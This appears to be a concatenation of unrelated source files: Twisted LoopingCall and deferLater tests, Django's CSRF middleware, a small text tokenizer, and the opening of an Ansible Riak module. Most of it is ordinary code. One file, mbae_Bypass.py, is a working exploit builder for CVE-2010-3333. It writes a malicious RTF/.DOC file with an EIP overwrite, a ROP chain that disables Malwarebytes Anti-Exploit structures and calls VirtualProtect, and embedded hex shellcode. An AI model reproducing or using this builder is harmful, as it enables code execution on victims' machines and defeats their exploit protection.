        made. So, if more than one, but less than two intervals pass between
        invocations, it won't increase the count above 1. For example, a
        L{LoopingCall} with interval T expects to be invoked at T, 2T, 3T, etc.
        However, the reactor takes some time to get around to calling it, so in
        practice it will be called at T+something, 2T+something, 3T+something;
        and due to other things going on in the reactor, "something" is
        variable. It won't increase the count unless "something" is greater
        than T. So if the L{LoopingCall} is invoked at T, 2.75T, and 3T,
        the count has not increased, even though the distance between
        invocation 1 and invocation 2 is 1.75T.
        """
        times = []
        clock = task.Clock()
        def aCallback(count):
            times.append((clock.seconds(), count))

        # Start a LoopingCall that tracks the time passed, and the number of
        # calls, with a 0.5 second increment.
        call = task.LoopingCall.withCount(aCallback)
        call.clock = clock
        INTERVAL = 0.5
        REALISTIC_DELAY = 0.01
        call.start(INTERVAL)
        self.assertEqual(times.pop(), (0, 1))

        # About one interval... So far, so good
        clock.advance(INTERVAL + REALISTIC_DELAY)
        self.assertEqual(times.pop(), (INTERVAL + REALISTIC_DELAY, 1))

        # Oh no, something delayed us for a while.
        clock.advance(INTERVAL * 1.75)
        self.assertEqual(times.pop(), ((2.75 * INTERVAL) + REALISTIC_DELAY, 1))

        # Back on track! We got invoked when we expected this time.
        clock.advance(INTERVAL * 0.25)
        self.assertEqual(times.pop(), ((3.0 * INTERVAL) + REALISTIC_DELAY, 1))

    def testBasicFunction(self):
        """
        A L{LoopingCall} should invoke its callable once per interval with
        the positional and keyword arguments given at construction time.
        """
        # Arrange to have time advanced enough so that our function is
        # called a few times.
        # Only need to go to 2.5 to get 3 calls, since the first call
        # happens before any time has elapsed.
        timings = [0.05, 0.1, 0.1]

        clock = task.Clock()
        L = []
        def foo(a, b, c=None, d=None):
            L.append((a, b, c, d))

        lc = TestableLoopingCall(clock, foo, "a", "b", d="d")
        D = lc.start(0.1)

        theResult = []
        def saveResult(result):
            theResult.append(result)
        D.addCallback(saveResult)

        clock.pump(timings)

        self.assertEquals(len(L), 3,
                          "got %d iterations, not 3" % (len(L),))

        for (a, b, c, d) in L:
            self.assertEquals(a, "a")
            self.assertEquals(b, "b")
            self.assertEquals(c, None)
            self.assertEquals(d, "d")

        lc.stop()
        self.assertIdentical(theResult[0], lc)

        # Make sure it isn't planning to do anything further.
        self.failIf(clock.calls)

    def testDelayedStart(self):
        """
        With C{now=False}, the first invocation happens only after one full
        interval has elapsed.
        """
        timings = [0.05, 0.1, 0.1]

        clock = task.Clock()
        L = []
        lc = TestableLoopingCall(clock, L.append, None)
        d = lc.start(0.1, now=False)

        theResult = []
        def saveResult(result):
            theResult.append(result)
        d.addCallback(saveResult)

        clock.pump(timings)

        self.assertEquals(len(L), 2,
                          "got %d iterations, not 2" % (len(L),))
        lc.stop()
        self.assertIdentical(theResult[0], lc)

        self.failIf(clock.calls)

    def testBadDelay(self):
        """
        Starting a L{LoopingCall} with a negative interval raises
        L{ValueError}.
        """
        lc = task.LoopingCall(lambda: None)
        self.assertRaises(ValueError, lc.start, -1)

    # Make sure that LoopingCall.stop() prevents any subsequent calls.
    def _stoppingTest(self, delay):
        # Shared helper: start with now=False and stop immediately; the
        # callable must never run and no calls may remain scheduled.
        ran = []
        def foo():
            ran.append(None)

        clock = task.Clock()
        lc = TestableLoopingCall(clock, foo)
        d = lc.start(delay, now=False)
        lc.stop()
        self.failIf(ran)
        self.failIf(clock.calls)

    def testStopAtOnce(self):
        """
        Stopping immediately after a zero-interval delayed start prevents
        any invocation.
        """
        return self._stoppingTest(0)

    def testStoppingBeforeDelayedStart(self):
        """
        Stopping before the first delayed invocation prevents any
        invocation.
        """
        return self._stoppingTest(10)
class ReactorLoopTestCase(unittest.TestCase):
    # Slightly inferior tests which exercise interactions with an actual
    # reactor.

    def testFailure(self):
        """
        An exception raised by the looped callable is delivered as a
        failure on the deferred returned by LoopingCall.start.
        """
        def foo(x):
            raise TestException(x)
        lc = task.LoopingCall(foo, "bar")
        return self.assertFailure(lc.start(0.1), TestException)

    def testFailAndStop(self):
        """
        Calling stop() inside the callable before raising still delivers
        the exception to the start() deferred.
        """
        def foo(x):
            lc.stop()
            raise TestException(x)
        lc = task.LoopingCall(foo, "bar")
        return self.assertFailure(lc.start(0.1), TestException)

    def testEveryIteration(self):
        """
        With an interval of 0 the callable runs on every reactor
        iteration until stop() is called; here it runs exactly 6 times.
        """
        ran = []
        def foo():
            ran.append(None)
            if len(ran) > 5:
                lc.stop()
        lc = task.LoopingCall(foo)
        d = lc.start(0)
        def stopped(ign):
            self.assertEquals(len(ran), 6)
        return d.addCallback(stopped)

    def testStopAtOnceLater(self):
        # Ensure that even when LoopingCall.stop() is called from a
        # reactor callback, it still prevents any subsequent calls.
        d = defer.Deferred()
        def foo():
            d.errback(failure.DefaultException(
                "This task also should never get called."))
        self._lc = task.LoopingCall(foo)
        self._lc.start(1, now=False)
        reactor.callLater(0, self._callback_for_testStopAtOnceLater, d)
        return d

    def _callback_for_testStopAtOnceLater(self, d):
        # Helper for testStopAtOnceLater: stop the loop from a reactor
        # callback, then fire the test's deferred on the next iteration.
        self._lc.stop()
        reactor.callLater(0, d.callback, "success")

    def testWaitDeferred(self):
        # Tests if the callable isn't scheduled again before the returned
        # deferred has fired.
        timings = [0.2, 0.8]
        clock = task.Clock()
        def foo():
            d = defer.Deferred()
            d.addCallback(lambda _: lc.stop())
            clock.callLater(1, d.callback, None)
            return d
        lc = TestableLoopingCall(clock, foo)
        d = lc.start(0.2)
        clock.pump(timings)
        # No further calls may be pending once the loop has stopped.
        self.failIf(clock.calls)

    def testFailurePropagation(self):
        # Tests if the failure of the errback of the deferred returned by the
        # callable is propagated to the lc errback.
        #
        # To make sure this test does not hang trial when LoopingCall does not
        # wait for the callable's deferred, it also checks there are no
        # calls in the clock's callLater queue.
        timings = [0.3]
        clock = task.Clock()
        def foo():
            d = defer.Deferred()
            clock.callLater(0.3, d.errback, TestException())
            return d
        lc = TestableLoopingCall(clock, foo)
        d = lc.start(1)
        self.assertFailure(d, TestException)
        clock.pump(timings)
        self.failIf(clock.calls)
        return d

    def test_deferredWithCount(self):
        """
        In the case that the function passed to L{LoopingCall.withCount}
        returns a deferred, which does not fire before the next interval
        elapses, the function should not be run again. And if a function call
        is skipped in this fashion, the appropriate count should be
        provided.
        """
        testClock = task.Clock()
        d = defer.Deferred()
        deferredCounts = []

        def countTracker(possibleCount):
            # Keep a list of call counts
            deferredCounts.append(possibleCount)

            # Return a deferred, but only on the first request
            if len(deferredCounts) == 1:
                return d
            else:
                return None

        # Start a looping call for our countTracker function
        # Set the increment to 0.2, and do not call the function on startup.
        lc = task.LoopingCall.withCount(countTracker)
        lc.clock = testClock
        d = lc.start(0.2, now=False)

        # Confirm that nothing has happened yet.
        self.assertEquals(deferredCounts, [])

        # Advance the clock by 0.2 and then 0.4;
        testClock.pump([0.2, 0.4])

        # We should now have exactly one count (of 1 call)
        self.assertEquals(len(deferredCounts), 1)

        # Fire the deferred, and advance the clock by another 0.2
        d.callback(None)
        testClock.pump([0.2])

        # We should now have exactly 2 counts...
        self.assertEquals(len(deferredCounts), 2)

        # The first count should be 1 (one call)
        # The second count should be 3 (calls were missed at about 0.6 and 0.8)
        self.assertEquals(deferredCounts, [1, 3])
class DeferLaterTests(unittest.TestCase):
    """
    Tests for L{task.deferLater}.
    """

    def test_callback(self):
        """
        The L{Deferred} returned by L{task.deferLater} is called back after
        the specified delay with the result of the function passed in.
        """
        collected = []
        marker = object()
        def callable(foo, bar):
            collected.append((foo, bar))
            return marker
        scheduler = task.Clock()
        deferred = task.deferLater(scheduler, 3, callable, 'foo', bar='bar')
        deferred.addCallback(self.assertIdentical, marker)
        # One tick short of the delay: nothing has run yet.
        scheduler.advance(2)
        self.assertEqual(collected, [])
        # Crossing the delay fires the call exactly once.
        scheduler.advance(1)
        self.assertEqual(collected, [('foo', 'bar')])
        return deferred

    def test_errback(self):
        """
        The L{Deferred} returned by L{task.deferLater} is errbacked if the
        supplied function raises an exception.
        """
        def failer():
            raise TestException()
        scheduler = task.Clock()
        deferred = task.deferLater(scheduler, 1, failer)
        scheduler.advance(1)
        return self.assertFailure(deferred, TestException)

    def test_cancel(self):
        """
        The L{Deferred} returned by L{task.deferLater} can be
        cancelled to prevent the call from actually being performed.
        """
        invocations = []
        scheduler = task.Clock()
        deferred = task.deferLater(scheduler, 1, invocations.append, None)
        deferred.cancel()
        def cbCancelled(ignored):
            # No timed calls may remain outstanding after cancellation.
            self.assertEquals([], scheduler.getDelayedCalls())
            # And the target callable must never have run.
            self.assertFalse(invocations)
        self.assertFailure(deferred, defer.CancelledError)
        deferred.addCallback(cbCancelled)
        return deferred
| apache-2.0 |
liuliwork/django | django/middleware/csrf.py | 155 | 8477 | """
Cross Site Request Forgery Middleware.
This module provides a middleware that implements protection
against request forgeries from other sites.
"""
from __future__ import unicode_literals
import logging
import re
from django.conf import settings
from django.core.urlresolvers import get_callable
from django.utils.cache import patch_vary_headers
from django.utils.crypto import constant_time_compare, get_random_string
from django.utils.encoding import force_text
from django.utils.http import same_origin
# Logger shared by Django's request-handling machinery.
logger = logging.getLogger('django.request')

# Human-readable reasons passed to the CSRF failure view when a request
# is rejected; REASON_BAD_REFERER is a format string taking
# (referer, expected_origin).
REASON_NO_REFERER = "Referer checking failed - no Referer."
REASON_BAD_REFERER = "Referer checking failed - %s does not match %s."
REASON_NO_CSRF_COOKIE = "CSRF cookie not set."
REASON_BAD_TOKEN = "CSRF token missing or incorrect."

# Length, in characters, of a CSRF token.
CSRF_KEY_LENGTH = 32
def _get_failure_view():
    """Resolve and return the view callable used for CSRF rejections."""
    view_path = settings.CSRF_FAILURE_VIEW
    return get_callable(view_path)
def _get_new_csrf_key():
    """Return a new random alphanumeric CSRF key of CSRF_KEY_LENGTH chars."""
    return get_random_string(CSRF_KEY_LENGTH)
def get_token(request):
    """
    Return the CSRF token required for a POST form, creating a new one in
    request.META if none is set yet. The token is an alphanumeric value.

    Calling this also marks the cookie as used, which makes the
    csrf_protect decorator and CsrfViewMiddleware emit a CSRF cookie and
    a 'Vary: Cookie' header on the response — so call it lazily (as the
    csrf context processor does) if that side effect is unwanted.
    """
    meta = request.META
    if "CSRF_COOKIE" not in meta:
        meta["CSRF_COOKIE"] = _get_new_csrf_key()
    meta["CSRF_COOKIE_USED"] = True
    return meta["CSRF_COOKIE"]
def rotate_token(request):
    """
    Replace the CSRF token in use for a request with a fresh one and mark
    it used — should be done on login for security purposes.
    """
    request.META["CSRF_COOKIE"] = _get_new_csrf_key()
    request.META["CSRF_COOKIE_USED"] = True
def _sanitize_token(token):
    """
    Reduce a cookie value to alphanumeric characters only; if the value
    is over-long or empties out entirely, replace it with a fresh key.
    """
    if len(token) > CSRF_KEY_LENGTH:
        # Oversized values are discarded outright.
        return _get_new_csrf_key()
    cleaned = re.sub('[^a-zA-Z0-9]+', '', force_text(token))
    if not cleaned:
        # In case the cookie has been truncated to nothing at some point.
        return _get_new_csrf_key()
    return cleaned
class CsrfViewMiddleware(object):
    """
    Middleware that requires a present and correct csrfmiddlewaretoken
    for POST requests that have a CSRF cookie, and sets an outgoing
    CSRF cookie.

    This middleware should be used in conjunction with the csrf_token template
    tag.
    """
    # The _accept and _reject methods currently only exist for the sake of the
    # requires_csrf_token decorator.
    def _accept(self, request):
        # Avoid checking the request twice by adding a custom attribute to
        # request. This will be relevant when both decorator and middleware
        # are used.
        request.csrf_processing_done = True
        return None

    def _reject(self, request, reason):
        # Log the rejection at warning level, then delegate the actual 403
        # response to the configured CSRF failure view.
        logger.warning('Forbidden (%s): %s', reason, request.path,
            extra={
                'status_code': 403,
                'request': request,
            }
        )
        return _get_failure_view()(request, reason=reason)

    def process_view(self, request, callback, callback_args, callback_kwargs):
        """
        Enforce the CSRF check for unsafe methods; return None to let the
        request proceed, or a rejection response from the failure view.
        """
        if getattr(request, 'csrf_processing_done', False):
            return None

        try:
            csrf_token = _sanitize_token(
                request.COOKIES[settings.CSRF_COOKIE_NAME])
            # Use same token next time
            request.META['CSRF_COOKIE'] = csrf_token
        except KeyError:
            csrf_token = None

        # Wait until request.META["CSRF_COOKIE"] has been manipulated before
        # bailing out, so that get_token still works
        if getattr(callback, 'csrf_exempt', False):
            return None

        # Assume that anything not defined as 'safe' by RFC2616 needs protection
        if request.method not in ('GET', 'HEAD', 'OPTIONS', 'TRACE'):
            if getattr(request, '_dont_enforce_csrf_checks', False):
                # Mechanism to turn off CSRF checks for test suite.
                # It comes after the creation of CSRF cookies, so that
                # everything else continues to work exactly the same
                # (e.g. cookies are sent, etc.), but before any
                # branches that call reject().
                return self._accept(request)

            if request.is_secure():
                # Suppose user visits http://example.com/
                # An active network attacker (man-in-the-middle, MITM) sends a
                # POST form that targets https://example.com/detonate-bomb/ and
                # submits it via JavaScript.
                #
                # The attacker will need to provide a CSRF cookie and token, but
                # that's no problem for a MITM and the session-independent
                # nonce we're using. So the MITM can circumvent the CSRF
                # protection. This is true for any HTTP connection, but anyone
                # using HTTPS expects better! For this reason, for
                # https://example.com/ we need additional protection that treats
                # http://example.com/ as completely untrusted. Under HTTPS,
                # Barth et al. found that the Referer header is missing for
                # same-domain requests in only about 0.2% of cases or less, so
                # we can use strict Referer checking.
                referer = force_text(
                    request.META.get('HTTP_REFERER'),
                    strings_only=True,
                    errors='replace'
                )
                if referer is None:
                    return self._reject(request, REASON_NO_REFERER)

                # Note that request.get_host() includes the port.
                good_referer = 'https://%s/' % request.get_host()
                if not same_origin(referer, good_referer):
                    reason = REASON_BAD_REFERER % (referer, good_referer)
                    return self._reject(request, reason)

            if csrf_token is None:
                # No CSRF cookie. For POST requests, we insist on a CSRF cookie,
                # and in this way we can avoid all CSRF attacks, including login
                # CSRF.
                return self._reject(request, REASON_NO_CSRF_COOKIE)

            # Check non-cookie token for match.
            request_csrf_token = ""
            if request.method == "POST":
                try:
                    request_csrf_token = request.POST.get('csrfmiddlewaretoken', '')
                except IOError:
                    # Handle a broken connection before we've completed reading
                    # the POST data. process_view shouldn't raise any
                    # exceptions, so we'll ignore and serve the user a 403
                    # (assuming they're still listening, which they probably
                    # aren't because of the error).
                    pass

            if request_csrf_token == "":
                # Fall back to X-CSRFToken, to make things easier for AJAX,
                # and possible for PUT/DELETE.
                request_csrf_token = request.META.get(settings.CSRF_HEADER_NAME, '')

            # constant_time_compare avoids leaking token contents via timing.
            if not constant_time_compare(request_csrf_token, csrf_token):
                return self._reject(request, REASON_BAD_TOKEN)

        return self._accept(request)

    def process_response(self, request, response):
        """
        Set/refresh the CSRF cookie on the outgoing response when the
        token was used during this request; always return the response.
        """
        if getattr(response, 'csrf_processing_done', False):
            return response

        # If the token was never consumed (get_token not called), skip
        # setting the cookie entirely.
        if not request.META.get("CSRF_COOKIE_USED", False):
            return response

        # Set the CSRF cookie even if it's already set, so we renew
        # the expiry timer.
        response.set_cookie(settings.CSRF_COOKIE_NAME,
                            request.META["CSRF_COOKIE"],
                            max_age=settings.CSRF_COOKIE_AGE,
                            domain=settings.CSRF_COOKIE_DOMAIN,
                            path=settings.CSRF_COOKIE_PATH,
                            secure=settings.CSRF_COOKIE_SECURE,
                            httponly=settings.CSRF_COOKIE_HTTPONLY
                            )
        # Content varies with the CSRF cookie, so set the Vary header.
        patch_vary_headers(response, ('Cookie',))
        response.csrf_processing_done = True
        return response
| bsd-3-clause |
r41p41/snippets | mbae_Bypass.py | 2 | 29684 | import binascii
import sys
filename = "finalOutput.DOC"
import struct
# CVE-2010-3333, builder picked from some random forum.
# modified to work on windows xp-8, office 2007 (enforced DEP)
# rop chain first moves NULL into 2 offsets of mbae internal structs, then changes stack to RWX using mona.py
# working as of April 6, 2015
file="{\\rtF#\ansi\aNsIcpg1252\dEFf0\defLANG1033{\fONttbl{\f1\fswiss\FPRQ2\fcHArsET0 Berlin Sans FB Demi;}{\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a}{\f2\fnil\fcharset2 Symbol;}{\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a}}{/*/*/*}"
file+="\x0d\x0a"*2400000 #inc for UD -_-
file+="{\colortbl ;\red73\green255\blue73;}"
file+="{\*\generator Msftedit 5.41.15.1507;}\viewkind4\uc1\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent0{\pntxtb\'B7}}\fi-720\li720\qc\cf1\ul\b\i\f0\fs20 5/28/2011\cf0\ulnone\b0\i0\par"
file+="\cf1\ul\b\i\f1\fs40{\pntext\f2\'B7\tab}...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasd
kasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd\cf0\ulnone\b0\i0\f0\fs20\par{\shp{\sp{\sn9pFRagMEnTS}{\*\*\*}{{{\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a}{{{{{\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a}}}{\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a}}}}{\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a}}{\*\*\sv {\*}9;2;a123456789.################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
##########################################################################################################################################################################################################################050000000000000000000000000000000000000000"
file+=b'd9808878' #EIP
file+="9149414941444347FFFFFFFFFFFAFFFFBFFFFFFF"
magic_offset = 0x4cc90
rop_gadgets = [
0x78833e3c, # POP EAX # RETN
0x78801108, # GetModuleHandle Address
0x78830e9a, # MOV EAX,[EAX] # RETN
0x788543e9, # XCHG EAX,EDX # RETN
0x7882ab5d, # PUSH ESP # POP ESI # RETN
0x788e4a48, # XCHG EAX,ESI # RETN
0x788079f0, # POP EBP # RETN
0x00000098, # offset from esp pointing towards mbae.dll
0x788d0ba7, # ADD EAX,EBP # RETN # eax points to mbae.dll
0x7889363e, # POP ECX # RETN
0x7889363f, # RETN
0x788fad49, # POP EDI # RETN
0x7889363f, # RETN
0x7880126c, # POP ESI # RETN
0x7888e209, # ADD ESP,0xC
0x788172ee, # PUSHAD # RETN #EAX gets base address of mbae.dll
0x788079f0, # POP EBP # RETN
magic_offset,
0x788d0ba7, # ADD EAX,EBP # RETN # eax points to magic offset
0x7880A254, # POP EDX, RETN
0x00000000, # NULL
0x78907a82, # MOV [EAX],EDX # RETN
0x7887b821, # ADD EAX,4 # RETN
0x78830e9a, # MOV EAX,[EAX] # RETN
0x78907a82, # MOV [EAX],EDX # RETN
0x78833e3c, # POP EAX # RETN
0x788011c0, # ptr to VirtualProtect()
0x788b53d1, # MOV EAX,DWORD PTR DS:[EAX] # RETN
0x788e4a48, # XCHG EAX,ESI # RETN
0x78832a79, # POP EBX # RETN
0x00000201, # 0x00000201-> ebx
0x7880a254, # POP EDX # RETN
0x00000040, # 0x00000040-> edx
0x78854775, # POP EBP # RETN
0x788b7b2b, # jmp esp
0x7889363e, # POP ECX # RETN
0x78922ad5, # &Writable location msxml5.dll
0x788fad49, # POP EDI # RETN
0x788880d4, # RETN (ROP NOP)
0x78833e3c, # POP EAX # RETN
0x90909090, # nop
0x788172ee, # PUSHAD # RETN
]
rop=''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop= binascii.hexlify(rop)
payload=rop
payload+= b'9090eb09' # eb 09 to jump over mbae.dll's ascii
payload+= b'6d6261652e646c6c00909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090'
shellcode= b'fce8890000006089e531d2648b52308b520c8b52148b72280fb74a2631ff31c0ac3c617c022c20c1cf0d01c7e2f052578b52108b423c01d08b407885c0744a01d0508b48188b582001d3e33c498b348b01d631ff31c0acc1cf0d01c738e075f4037df83b7d2475e2588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe0585f5a8b12eb865d6a018d85b90000005068318b6f87ffd5bbf0b5a25668a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd563616c6300'
payload+=shellcode
nxt="{}}}}}{}{}{{{{{}}}}}}"
nxt+="\x0d\x0a"
nxt+="}"
nxt+="\x0d\x0a\x00"
buff="If Peter Piper picked a pack of pickled peppers, how many pickled peppers did Peter Piper pick??????"*100
textfile = open(filename , 'w')
textfile.write(file+payload+nxt+buff)
textfile.close()
| mit |
spirali/elphie | elphie/textparser.py | 1 | 1946 |
def normalize_tokens(tokens):
    """Normalize a (name, value) token stream.

    Drops "text" tokens with an empty payload, collapses consecutive
    "newline" tokens into one (summing their counts), and strips a
    trailing "newline" token.
    """
    # Keep everything except text tokens whose payload is empty.
    cleaned = [(name, value) for name, value in tokens
               if name != "text" or value]

    # Collapse runs of adjacent newline tokens, accumulating the count.
    merged = []
    for name, value in cleaned:
        if name == "newline" and merged and merged[-1][0] == "newline":
            merged[-1] = ("newline", merged[-1][1] + value)
        else:
            merged.append((name, value))

    # A newline at the very end carries no content; drop it.
    if merged and merged[-1][0] == "newline":
        merged.pop()
    return merged
def parse_text(text, escape_char="~", begin_char="{", end_char="}"):
    """Tokenize *text* into (name, value) pairs for markup commands.

    With the default characters a command is written ``~name{...}``:
    `escape_char` introduces the command name, `begin_char` opens its
    body and `end_char` closes it.  Emits "text", "begin", "end" and
    "newline" tokens; the stream is normalized by normalize_tokens().

    Raises Exception when begin/end characters are unbalanced.
    """
    result = []
    start = 0  # start index of the current plain-text run
    i = 0
    counter = 0  # open-command depth; must return to zero
    while i < len(text):
        c = text[i]
        if c == escape_char:
            # Flush the pending text run, then consume the command name
            # up to (but not including) begin_char.
            result.append(("text", text[start:i]))
            i += 1
            start = i
            while i < len(text) and text[i] != begin_char:
                i += 1
            result.append(("begin", text[start:i]))
            i += 1  # skip over begin_char itself
            start = i
            counter += 1
        elif c == end_char:
            result.append(("text", text[start:i]))
            result.append(("end", None))
            i += 1
            start = i
            counter -= 1
            if counter < 0:
                raise Exception("Invalid format, too many closing characters")
        else:
            i += 1
    if i != start:
        # Trailing text after the last special character.
        result.append(("text", text[start:i]))
    # Second pass: split embedded "\n" inside text tokens into explicit
    # ("newline", 1) tokens so downstream code never sees raw newlines.
    final_result = []
    for r in result:
        if r[0] != "text":
            final_result.append(r)
            continue
        lines = r[1].split("\n")
        final_result.append(("text", lines[0]))
        for line in lines[1:]:
            final_result.append(("newline", 1))
            final_result.append(("text", line))
    if counter > 0:
        raise Exception("Invalid format, unclosed command")
    return normalize_tokens(final_result)
| bsd-2-clause |
kennethgillen/ansible | lib/ansible/modules/database/misc/riak.py | 70 | 8254 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, James Martin <jmartin@basho.com>, Drew Kerrigan <dkerrigan@basho.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: riak
short_description: This module handles some common Riak operations
description:
- This module can be used to join nodes to a cluster, check
the status of the cluster.
version_added: "1.2"
author:
- "James Martin (@jsmartin)"
- "Drew Kerrigan (@drewkerrigan)"
options:
command:
description:
- The command you would like to perform against the cluster.
required: false
default: null
choices: ['ping', 'kv_test', 'join', 'plan', 'commit']
config_dir:
description:
- The path to the riak configuration directory
required: false
default: /etc/riak
http_conn:
description:
- The ip address and port that is listening for Riak HTTP queries
required: false
default: 127.0.0.1:8098
target_node:
description:
- The target node for certain operations (join, ping)
required: false
default: riak@127.0.0.1
wait_for_handoffs:
description:
- Number of seconds to wait for handoffs to complete.
required: false
default: null
wait_for_ring:
description:
- Number of seconds to wait for all nodes to agree on the ring.
required: false
default: null
wait_for_service:
description:
- Waits for a riak service to come online before continuing.
required: false
default: None
choices: ['kv']
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be used
on personally controlled sites using self-signed certificates.
required: false
default: 'yes'
choices: ['yes', 'no']
version_added: 1.5.1
'''
EXAMPLES = '''
# Join's a Riak node to another node
- riak:
command: join
target_node: riak@10.1.1.1
# Wait for handoffs to finish. Use with async and poll.
- riak:
wait_for_handoffs: yes
# Wait for riak_kv service to startup
- riak:
wait_for_service: kv
'''
import time
import socket
import sys
try:
import json
except ImportError:
try:
import simplejson as json
except ImportError:
# Let snippet from module_utils/basic.py return a proper error in this case
pass
def ring_check(module, riak_admin_bin):
    """Return True when `riak-admin ringready` reports full ring agreement."""
    rc, out, _err = module.run_command('%s ringready' % riak_admin_bin)
    # riak-admin exits 0 and prints this marker only when every node agrees.
    return rc == 0 and 'TRUE All nodes agree on the ring' in out
def main():
    """Ansible entry point: run the requested Riak cluster command.

    Fetches node stats over HTTP (node name, ring members, ring size),
    dispatches on `command`, honours the wait_for_* options, and reports
    the outcome via module.exit_json()/fail_json().
    """
    module = AnsibleModule(
        argument_spec=dict(
            command=dict(required=False, default=None, choices=[
                'ping', 'kv_test', 'join', 'plan', 'commit']),
